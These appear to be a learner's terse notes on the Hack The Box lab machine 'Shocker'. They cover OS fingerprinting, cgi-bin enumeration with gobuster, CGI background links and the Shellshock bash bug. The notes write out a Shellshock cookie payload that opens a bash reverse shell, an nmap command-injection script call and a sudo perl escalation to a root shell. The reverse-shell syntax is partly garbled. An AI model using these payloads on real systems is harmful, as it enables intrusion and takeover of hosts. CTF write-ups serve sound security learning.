shocker

Shocker shellshock

apache header tells ubuntu version ssh version tells ubuntu version

Based on the OpenSSH and Apache versions, the host is likely running Ubuntu 16.04. https://packages.ubuntu.com/search?keywords=openssh-server https://packages.ubuntu.com/search?keywords=apache2

open in browser ; view page source gobuster does not reveals sesnitive dir because it does not dirb and dirsearch automatically addess a slash for directories in the wordlist but it doubles the no. of attempts . so dirb will find it in first go. if want to run gobuster add -f flag to look for directories i.e simply addessa a slash in wordlist

will get a cgi-bin directory

what is CGI ? let's configure our own cgi on apache server how to enable disable cgi for apache write your own cgi script configure cgi

Learning Apache http server - Executing CGI scripts - YouTube https://www.youtube.com/watch?v=aWWK5tqvuyg

Lecture -19 CGI Scripts - YouTube https://www.youtube.com/watch?v=cP1fN6xf3nI

Common gateway interface|CGI bin - YouTube https://www.youtube.com/watch?v=rRnMLwj5GWk

Common Gateway Interface(CGI) || working process of Common Gateway Interface - YouTube https://www.youtube.com/watch?v=cKckh5pD7VI

Create first cgi script - YouTube https://www.youtube.com/watch?v=XBnGTXDu9gc

How To Enable or Disable CGI Scripts in Apache - YouTube https://www.youtube.com/watch?v=Wr2IVt9X-zY

run recurse inside this directory looking for command cgi scripts

it defines how info / comm takes place btwn browser n server

creating pages dynamically noyh

shellshock is a bug in bash old version of bash precisely https://www.youtube.com/watch?v=MyldPMn95kk Shellshock Code & the Bash Bug - Computerphile

└─$ gobuster dir -o gobust-cgi.txt -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.56/cgi-bin/ -x sh,pl,cgi

nmap -p80 --scipt http-shellshock --script-args uri=/cgi-bin/user.sh,cmd=echo\;/bin/ls

reverse shell bash one liner rev shell cookie: () { :;}; echo; /bin/bash -i >&& /dev/tcp/ip/port 0>&1

priv esc sudo /usr/bin/perl -e 'exec("/bin/bash")'

PreviousLinuxNextOSPG

Last updated

Was this helpful?